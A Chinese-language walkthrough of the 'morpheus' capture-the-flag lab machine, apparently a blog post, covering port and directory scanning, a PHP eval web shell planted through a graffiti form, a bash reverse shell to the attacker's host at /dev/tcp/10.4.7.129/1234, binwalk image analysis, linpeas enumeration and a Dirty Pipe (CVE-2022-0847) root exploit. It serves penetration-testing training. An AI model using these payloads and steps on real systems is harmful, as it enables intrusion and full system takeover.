morpheus 靶机
IP 信息
kali:10.4.7.129
靶机:10.4.7.139
1. 扫描端口
nmap -A -p- 10.4.7.139
发现开放了:22、80、81 端口
2. 信息收集
(1)敏感目录扫描
dirb http://10.4.7.139
扫描出来 robots.txt 和 javascript
网页进行访问
查看源码并没有相关有效信息
访问 robots.txt
没有东西 说是让继续尝试查找
访问 javascript
没有权限访问
访问 81端口
admin | admin 尝试失败
这时候使用diresearch 使用 seclists 字典
dirsearch -u http://10.4.7.139/ -f -e html,php,txt -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
又扫描出两个 一个 graffiti.txt 一个 graffiti.php
挨个访问
没有什么关键信息 只有一个 涂鸦墙发泄一下?
再访问 graffiti.php
这个可能就是涂鸦墙
(2)漏洞发现
在这个涂鸦墙 graffiti.php 下 可以看到一个框
由于是php 可能存在上传一句话木马
先随意输入 看有什么效果
发现 写上的文本信息会直接打印在页面上
尝试上传一句话木马
<?php eval($_POST['cmd']); ?>
没有显示
查看源码
发现写入的被注释了
message为一句话木马的url编码
用 bp 抓包看一下
将后面的 .txt 文件更改为php 文件 改成 lllphp
然后蚁剑测试连接
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传
成功连接
打开虚拟终端 低权限的系统用户
(3)上传反弹shell
这时候上传一个反弹shell
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.4.7.129/1234 0>&1'");
?>
直接通过蚁剑直接上传
kali 开启监听
返回网页访问刚刚上传的文件
成功反弹到 kali
(4)最后阶段
来到根目录 发现了 FLAG.txt 文件
查看一下
翻译后:
说是在网站根目录下有一个 .cypher-neo.png 的一个图片
通过蚁剑可以发现有这个文件
在 kali上将这个图片下载下来
wget http://10.4.7.139/.cypher-neo.png
① binwalk 工具
Binwalk
是一个用于分析二进制文件的工具,特别是用于查找嵌入在其他文件中的数据或文件。它可以扫描给定的二进制文件,并识别其中可能存在的各种文件类型、文件系统和嵌入式固件等信息。
Binwalk
主要用于逆向工程、安全分析和数字取证。它可以帮助分析固件、固定存储设备、嵌入式系统等,以发现其中可能包含的信息,如压缩的文件、固件升级、加密的数据等。
该工具还可以通过插件系统进行扩展,使用户能够添加自定义的签名和分析模块。总体而言,Binwalk 是一个强大的工具,用于深入分析和理解各种二进制文件的内容。
基本用法:
-e
:提取嵌入的文件。-w
:执行分析操作,图片内受否嵌入文件-B
:使用已知签名进行分析。-M
:使用魔术文件类型进行分析。-y
:显示每个提取的文件的汇编指令。-l
:指定搜索的最大文件长度。-D
:指定递归搜索的最大深度。-x
:排除指定的签名模块。-A
:显示每个提取的文件的十六进制转储。
输入👇:
binwalk -w .cypher-neo.png
使用工具分析,发现嵌入了一个zlib文件
再输入👇:
binwalk -e .cypher-neo.png --run-as=root
## --run-as=root:
这是一个选项,用于指定 Binwalk 在执行提取操作时使用 root 用户权限。
通常,对于某些操作,特别是写入文件系统的操作,可能需要管理员权限。使用此选项可以确保具有足够权限来执行操作。
文件已经被提取 进入提取的文件目录
8A 是一个空文件
后者则为压缩文件
② linpeas 提权脚本
枚举linux操作系统几乎所有的可提权项
下载该文件
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
kali开启http服务
在靶机上输入👇
wget http://10.4.7.129/linpeas.sh
下载到靶机本地
然后给这个脚本赋权并执行
chmod 777 linpeas.sh
./linpeas.sh
扫描的项很多
推荐了很多 linux 漏洞执行建议
③ CVE-2022-0847 提权
这里使用 CVE-2022-0847
输入👇
git clone https://github.com/imfiver/CVE-2022-0847.git
下载下来之后 可以看一下使用方式
在当前目录开启一个 http 服务
python3 -m http.server 80
返回 www-data 系统用户下载下来
wget http://10.4.7.129/Dirty-Pipe.sh
下载下来之后再次给这个文件赋权并执行👇
chmod 777 Dirty-Pipe.sh
./Dirty-Pipe.sh
成功提权到 root 用户 拿到最后的 flag